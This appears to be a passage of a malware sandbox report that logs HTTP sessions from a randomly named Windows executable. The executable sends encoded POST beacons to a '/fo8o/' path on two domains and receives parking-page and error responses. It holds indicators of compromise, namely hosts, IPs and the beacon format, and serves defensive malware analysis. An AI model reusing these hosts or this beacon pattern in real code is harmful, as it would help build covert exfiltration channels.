                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.44996991.195.240.94803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:55:36.577708006 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.rssnewscast.com
                                                                              Origin: http://www.rssnewscast.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.rssnewscast.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                                                              Data Ascii: SHqP-p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                                                              Nov 21, 2024 12:55:37.945368052 CET707INHTTP/1.1 405 Not Allowed
                                                                              date: Thu, 21 Nov 2024 11:55:37 GMT
                                                                              content-type: text/html
                                                                              content-length: 556
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.44997591.195.240.94803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:55:39.244597912 CET10882OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.rssnewscast.com
                                                                              Origin: http://www.rssnewscast.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.rssnewscast.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 72 55 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumxjgYA3T03omVjmoKygZ3auJ1fqEyiPnZSOmmwNVQehO17FrO7yLilZzLBgYBWpkGikynLpHh/z8VpH01ZC01AOaFgACxHK9Br8lhYJTH+cQuTPcswDOawWreWLZROb4OQKDgXOpAzyrMvN6irQqFjBhHrUdG+IfBSNHSw7v+5bGEfkwDUsG9V5WGoC8+lR/xvv5niBHs5YxnNEvaYLO5HaaXzr9Yoi2eNK/mdKdDN+RzeKqs47wiqJPC1ch3USWoPC2f24K9QCdu1AgunazsdP+QpazQx7ROXqz+lwJKNZe1kvu/mxYEQfuN9kDrDcltTEHs/QZJEUzYvBM6bQMuPz1dVQDMpPWMz/pduf5vOWC2xUc3fv3IBc7OeUD7MIk0bf9Gbm+VO95HMSMAUe3tB+KdjVkVILNTrcl4P4HGW2E+u48IR+g1ays+RI/C1NBPJwVSCGAYSflKEdDQBKYWPtT2CERNvS+q2+Z7hUDmlvZrTzNm2Xa5KVKa1Co/3jN8MoOr7PfQ9Ia5yGc9dX0kFiKjsKUxE/Vp034fjrgGf9Mkg85IeCp+cob6ky3EsKMYZRr5JOnBPv4sN4v9yE4ndesPT8b8SoR6UgELJDvJDVi/IhvwyqS2mqOgKwAIreImiSDx0GiMs4qDzJw5y0zfSaRYkLSbz1s7AuiTEa1VmruK0xGZNeu6oOxQ587MegUgAtQ8J0kU9gVp6LCofjZX6p/d/Sn2hXihM9v1sm4iR2/t0BqhfxFWHV9Cy56ml/sLPWr4/1az18opf8DsZa1q68AlxVyJil3gJlvL/2Qi+kje9jUQzWqR8g3SLA60 [TRUNCATED]
                                                                              Nov 21, 2024 12:55:40.519042015 CET707INHTTP/1.1 405 Not Allowed
                                                                              date: Thu, 21 Nov 2024 11:55:40 GMT
                                                                              content-type: text/html
                                                                              content-length: 556
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.44998391.195.240.94803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:55:41.896395922 CET508OUTGET /fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.rssnewscast.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:55:43.312450886 CET1236INHTTP/1.1 200 OK
                                                                              date: Thu, 21 Nov 2024 11:55:43 GMT
                                                                              content-type: text/html; charset=UTF-8
                                                                              transfer-encoding: chunked
                                                                              vary: Accept-Encoding
                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              pragma: no-cache
                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_s+0CA6JISv73Xc32eJ2ucSjWklwJI7eUTPGT13U3HP0Z3l+ExEK7dtQmM//fL7/qxqqniedy/MawybEBkPr5NA==
                                                                              last-modified: Thu, 21 Nov 2024 11:55:43 GMT
                                                                              x-cache-miss-from: parking-7ffff5845f-2bmzc
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 73 2b 30 43 41 36 4a 49 53 76 37 33 58 63 33 32 65 4a 32 75 63 53 6a 57 6b 6c 77 4a 49 37 65 55 54 50 47 54 31 33 55 33 48 50 30 5a 33 6c 2b 45 78 45 4b 37 64 74 51 6d 4d 2f 2f 66 4c 37 2f 71 78 71 71 6e 69 65 64 79 2f 4d 61 77 79 62 45 42 6b 50 72 35 4e 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                              Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_s+0CA6JISv73Xc32eJ2ucSjWklwJI7eUTPGT13U3HP0Z3l+ExEK7dtQmM//fL7/qxqqniedy/MawybEBkPr5NA==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                                              Nov 21, 2024 12:55:43.312478065 CET224INData Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                                              Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png"
                                                                              Nov 21, 2024 12:55:43.312493086 CET1236INData Raw: 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74
                                                                              Data Ascii: href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.css v7.0.0 | MIT Li
                                                                              Nov 21, 2024 12:55:43.312515974 CET1236INData Raw: 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61
                                                                              Data Ascii: optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}butto576n,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butt
                                                                              Nov 21, 2024 12:55:43.312531948 CET1236INData Raw: 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a
                                                                              Data Ascii: }[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#7171
                                                                              Nov 21, 2024 12:55:43.312547922 CET1236INData Raw: 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73
                                                                              Data Ascii: om/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a
                                                                              Nov 21, 2024 12:55:43.312603951 CET1236INData Raw: 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e
                                                                              Data Ascii: -link:focus{text-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.
                                                                              Nov 21, 2024 12:55:43.312619925 CET1236INData Raw: 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f
                                                                              Data Ascii: r-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#555}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.con
                                                                              Nov 21, 2024 12:55:43.312638044 CET1236INData Raw: 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e
                                                                              Data Ascii: -header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window
                                                                              Nov 21, 2024 12:55:43.312654972 CET1097INData Raw: 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66
                                                                              Data Ascii: :medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}
                                                                              Nov 21, 2024 12:55:43.433368921 CET1236INData Raw: 35 37 36 0d 0a 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 0a 0a 20 20 20
                                                                              Data Ascii: 576oter{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"rssnewscast.com","domainName":"rssnewscast.com","domainPrice":


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.45001566.29.149.46803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:55:57.346892118 CET780OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.techchains.info
                                                                              Origin: http://www.techchains.info
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.techchains.info/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                              Data Ascii: SHqP-p=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
                                                                              Nov 21, 2024 12:55:58.673803091 CET637INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:55:58 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
